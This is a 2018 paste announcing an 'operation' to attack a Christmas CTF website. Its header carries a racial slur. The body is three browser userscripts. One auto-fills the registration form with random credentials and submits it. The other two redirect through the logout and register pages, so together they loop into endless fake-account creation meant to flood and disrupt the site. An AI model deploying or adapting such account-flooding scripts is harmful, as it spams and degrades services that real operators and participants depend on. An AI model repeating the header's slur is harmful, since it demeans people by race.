· 7 years ago · Dec 15, 2018, 10:42 PM
1OPERATION XY - DESTROJ ASAP ATTACK THIS NIGGAS!
2STARTED 15.12.2018 BY PSKTHEKING
3----------------------------------------------------------------------
4EXT 1
5----------------------------------------------------------------------
6// ==UserScript==
7// @name EXT 1
8// @namespace https://xmas-ctf.cf/register
9// @version 0.1
10// @description https://xmas-ctf.cf/register
11// @author PSKTHEKING
12// @match https://xmas-ctf.cf/register
13// @grant none
14// ==/UserScript==
15
16function makeid() {
17 var text = "";
18 var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
19
20 for (var i = 0; i < 12; i++)
21 text += possible.charAt(Math.floor(Math.random() * possible.length));
22
23 return text;
24}
25
26document.getElementById("name-input").value = makeid();
27document.getElementById("email-input").value = makeid() + "@gmail.com";
28document.getElementById("password-input").value = makeid();
29document.getElementById("submit").click();
30----------------------------------------------------------------------
31EXT 2
32----------------------------------------------------------------------
33// ==UserScript==
34// @name EXT2
35// @namespace https://xmas-ctf.cf/challenges
36// @version 0.1
37// @description https://xmas-ctf.cf/challenges
38// @author PSKTHEKING
39// @match https://xmas-ctf.cf/challenges
40// @grant none
41// ==/UserScript==
42
43window.location.href = "https://xmas-ctf.cf/logout";
44----------------------------------------------------------------------
45EXT 3
46----------------------------------------------------------------------
47// ==UserScript==
48// @name EXT3
49// @namespace https://xmas-ctf.cf/login?next=%2Fchallenges
50// @version 0.1
51// @description https://xmas-ctf.cf/login?next=%2Fchallenges
52// @author PSKTHEKING
53// @match https://xmas-ctf.cf/login?next=%2Fchallenges
54// @match https://xmas-ctf.cf/
55// @grant none
56// ==/UserScript==
57
58window.location.href = "https://xmas-ctf.cf/register";
59----------------------------------------------------------------------
60
61----------------------------------------------------------------------